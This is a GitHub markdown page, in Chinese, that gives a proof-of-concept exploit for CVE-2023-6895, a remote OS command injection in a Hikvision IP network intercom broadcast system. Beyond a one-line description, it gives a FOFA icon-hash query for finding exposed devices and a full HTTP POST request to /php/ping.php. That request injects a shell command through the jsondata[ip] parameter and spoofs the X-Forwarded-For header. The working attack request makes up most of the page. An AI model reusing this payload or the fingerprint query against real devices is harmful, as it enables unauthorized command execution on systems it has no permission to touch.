Skip to content

Latest commit

 

History

History
27 lines (24 loc) · 1.03 KB

海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行.md

File metadata and controls

27 lines (24 loc) · 1.03 KB

海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行

海康威视对讲广播系统3.0.3_20201113_RELEASE(HIK)存在漏洞。它已被宣布为关键。该漏洞影响文件/php/ping.php 的未知代码。使用输入 netstat -ano 操作参数 jsondata[ip] 会导致 os 命令注入。

fofa

icon_hash="-1830859634"

poc

POST /php/ping.php HTTP/1.1
Host: xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 45
Origin: http://xxx.xxx.xxx
Connection: close
Referer: http://xxx.xxx.xxx/html/system.html
X-Forwarded-For: 127.0.0.1

jsondata[type]=3&jsondata[ip]=ipconfig

0a7e02e1600a63bf856d6581f918b036